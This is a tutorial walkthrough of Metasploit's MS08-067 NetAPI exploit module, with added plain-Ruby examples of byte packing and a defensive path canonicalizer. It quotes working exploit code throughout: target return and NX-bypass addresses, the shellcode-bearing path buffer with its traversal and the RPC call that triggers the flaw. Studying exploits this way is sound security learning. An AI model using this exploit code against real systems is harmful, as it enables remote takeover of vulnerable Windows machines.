module ms08_067_netapi
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. Use Google to find more public information or Metasploit-focused papers.
Reading the exploit module
On BackTrack 5, Metasploit is deployed into /opt/framework3/msf3. You can read the exploit module on dev.metasploit.com or locally in /opt/framework3/msf3/modules/exploits/windows/smb/ms08_067_netapi.rb.
Main class
I don't know the right Ruby terms, but what is important is to gain experience by reading, even though you don't know the exact language syntax. When you are familiar with Python or PHP it will be easier than you think. The exploit starts with the Ruby class Metasploit3, which is derived from the parent class Msf::Exploit::Remote and includes code from the modules Msf::Exploit::Remote::DCERPC and Msf::Exploit::Remote::SMB.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB
I found the definitions of these modules in /opt/framework3/msf3/lib/msf/core/exploit. The scripts dcerpc.rb and smb.rb provide utility methods for interacting with DCERPC and SMB services. The class has a constructor which sets all the optional parameters we know from msfconsole (exploit description and parameters). An interesting detail is the Targets attribute, which is an array of:
'Targets' => [
  # Antoine's universal for Windows 2000
  # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
  [ 'Windows 2000 Universal',
    { 'Ret' => 0x001f1cb0,
      'Scratch' => 0x00020408,
    } ], # JMP EDI SVCHOST.EXE
  # Metasploit's NX bypass for XP SP2/SP3
  [ 'Windows XP SP2 Czech (NX)',
    {
      'Ret' => 0x6fe1f727,
      'DisableNX' => 0x6fe216e2,
      'Scratch' => 0x00020408
    } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
  ...........
Exploit method
The exploit method starts an SMB session with the remote victim.
def exploit
  connect()
  smb_login()
  # Use a copy of the target
  mytarget = target
  #
  # Windows 2000, XP (NX), and 2003 (NO NX) mytargets
  #
  if(not mytarget['RetDec'])
    jumper = Rex::Text.rand_text_alpha(70).upcase
    jumper[ 4,4] = [mytarget.ret].pack("V")
    jumper[50,8] = make_nops(8)
    jumper[58,2] = "\xeb\x62"
Jumper variable
Rex::Text is the Metasploit module for formatting text. The method Rex::Text.rand_text_alpha(70).upcase generates random alphabetic data and converts it to uppercase, so the jumper variable is a random character array 70 bytes long. After that, some substitutions follow at specific positions in the jumper array.
We inject the 4-byte return address into the array starting at the 4th byte. The method .pack("V") turns the integer into its 4-byte little-endian representation, which is what we need when working with addresses. From the 50th byte we put 8 NOP instructions. Hard to say what the final bytes "\xeb\x62" do, but ok, let's try to go ahead.
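To see what these Ruby primitives actually do, here is a plain-Ruby demonstration of Array#pack("V"), String#[]= slice assignment and UTF-16LE encoding (the output format of Rex::Text.to_unicode). This is an added example, not code from the Metasploit module; it needs no Rex library, and the 0x11223344 value and the 70-byte buffer are constructed stand-ins chosen so the byte layout is easy to read back.

```ruby
# Added example (not from the Metasploit module): plain-Ruby illustration of
# the primitives the walkthrough refers to. All values are constructed.

# pack("V") writes one unsigned 32-bit integer little-endian (least
# significant byte first), so 0x11223344 becomes the bytes 44 33 22 11.
def u32_le(value)
  [value].pack("V")
end

# unpack1("V") reverses it: the quick way to check what a 4-byte field in a
# captured buffer actually encodes.
def read_u32_le(bytes)
  bytes.unpack1("V")
end

# Stand-in for Rex::Text.rand_text_alpha(n).upcase: n random uppercase
# letters. Passing a seeded Random makes the output reproducible.
def random_upper_alpha(length, rng = Random.new)
  Array.new(length) { ("A".ord + rng.rand(26)).chr }.join
end

# Stand-in for Rex::Text.to_unicode on ASCII input: UTF-16LE without a BOM,
# so every ASCII character becomes its byte followed by 0x00.
def to_utf16le(str)
  str.encode("UTF-16LE").force_encoding("BINARY")
end

# Build a 70-byte buffer and overwrite fixed offsets the way the walkthrough
# describes, using str[offset, len] = replacement. The buffer is kept as a
# binary string so offsets are byte offsets.
def patch_buffer(rng = Random.new(1))
  buf = random_upper_alpha(70, rng).b
  buf[4, 4]  = u32_le(0x11223344)   # constructed placeholder 32-bit value
  buf[50, 8] = "B" * 8              # eight-byte filler at offset 50
  buf
end

# Read the patched fields back out and confirm the length did not change.
def inspect_buffer(buf)
  {
    length: buf.bytesize,
    field_at_4: read_u32_le(buf[4, 4]),
    filler_at_50: buf[50, 8],
  }
end

if __FILE__ == $PROGRAM_NAME
  p u32_le(0x11223344).bytes.map { |b| format("%02x", b) }  # ["44", "33", "22", "11"]
  p to_utf16le("\\..\\").bytes                                # [92, 0, 46, 0, 46, 0, 92, 0]
  p inspect_buffer(patch_buffer)
end
```

The point to take away is that slice assignment on a binary string overwrites exactly `len` bytes in place without changing the total length, and that `unpack1("V")` is the inverse of `pack("V")`, which is how you read such a field back out of a captured buffer.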
Path String construction
Now reading the composition of the path string is easier, given the methods we already know. We construct the path string from Unicode strings: a random 100-byte alpha array, then our chosen payload (encoded), then Unicode traversal backslashes and extra padding (pad='A').
path =
  Rex::Text.to_unicode("\\") +
  # This buffer is removed from the front
  Rex::Text.rand_text_alpha(100) +
  # Shellcode
  payload.encoded +
  # Relative path to trigger the bug
  Rex::Text.to_unicode("\\..\\..\\") +
  # Extra padding
  Rex::Text.to_unicode(pad) +
  # Writable memory location (static)
  [mytarget['Scratch']].pack("V") + # EBP
  # Return to code which disables NX (or just the return)
  [ mytarget['DisableNX'] || mytarget.ret ].pack("V") +
  # Padding with embedded jump
  jumper +
  # NULL termination
  "\x00" * 2
Now we add memory addresses to the path string: one is "Scratch" (a writable memory location), the other is a jump to the code which disables NX protection and continues into our jumper code. Finally we terminate the string with zero characters, which stop string processing when the string is interpreted by C functions.
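The first sentence of the page names the root cause as a path canonicalization flaw, and the "\\..\\..\\" component above is the traversal that reaches it. The following added example, which is neither Metasploit's nor NetAPI32's code, shows in plain Ruby what a canonicalizer has to get right: every ".." must be bounded against the root, and input that tries to climb above the root should be reported rather than silently absorbed. It assumes backslash-separated paths and UTF-16LE input (the encoding Rex::Text.to_unicode produces); the sample paths are constructed, and the helper is an illustration of the bug class, not a reconstruction of the NetAPI32.dll logic.

```ruby
# Added example (not from the Metasploit module and not NetAPI32's code):
# a bounded path canonicalizer plus a defender-side traversal check.
# Sample paths are constructed for the demonstration.

SEP = "\\"

# Rex::Text.to_unicode emits UTF-16LE; decode it back to a Ruby string and
# refuse input that is not valid UTF-16LE instead of guessing.
def from_utf16le(bytes)
  s = bytes.dup.force_encoding("UTF-16LE")
  raise ArgumentError, "invalid UTF-16LE" unless s.valid_encoding?
  s.encode("UTF-8")
end

# Split a backslash-separated path into components, dropping empty
# components (leading, trailing or doubled separators) and ".".
def components(path)
  path.split(SEP).reject { |c| c.empty? || c == "." }
end

# Canonicalize with an explicit depth check. Each ".." must have a
# component left to remove; when the stack is already empty the path is
# trying to climb above the root, which is recorded instead of ignored.
# Returns [canonical_path, escaped_root?].
def canonicalize(path)
  stack = []
  escaped = false
  components(path).each do |part|
    if part == ".."
      if stack.empty?
        escaped = true   # the bounds check a safe canonicalizer needs
      else
        stack.pop
      end
    else
      stack << part
    end
  end
  [SEP + stack.join(SEP), escaped]
end

# Defender-side helper: does this path (raw UTF-16LE or already decoded)
# attempt to traverse above its root? Handy when reviewing path strings
# pulled from request captures or server logs.
def traversal_above_root?(path, utf16: false)
  text = utf16 ? from_utf16le(path) : path
  canonicalize(text).last
end

if __FILE__ == $PROGRAM_NAME
  ok  = "\\share\\docs\\..\\readme.txt"   # constructed: stays under the root
  bad = "\\share\\..\\..\\x"               # constructed: climbs above the root
  p canonicalize(ok)                        # ["\\share\\readme.txt", false]
  p canonicalize(bad)                       # ["\\x", true]
  p traversal_above_root?(bad.encode("UTF-16LE"), utf16: true)  # true
end
```

Note that the canonical path returned for the bad input looks harmless on its own; only the second element of the pair tells you the request tried to escape, which is why the check returns both rather than a cleaned-up string alone.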
Sending the path string in the RPC call
    handle = dcerpc_handle(
      '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )
    dcerpc_bind(handle)
    stub = NDR.uwstring(server) +
      NDR.UnicodeConformantVaryingStringPreBuilt(path) +
      NDR.long(rand(1024)) + NDR.wstring(prefix) +
      NDR.long(4097) +
      NDR.long(0)
    # NOTE: we don't bother waiting for a response here...
    print_status("Attempting to trigger the vulnerability...")
    dcerpc.call(0x1f, stub, false)
    # Cleanup
    handler
    disconnect
end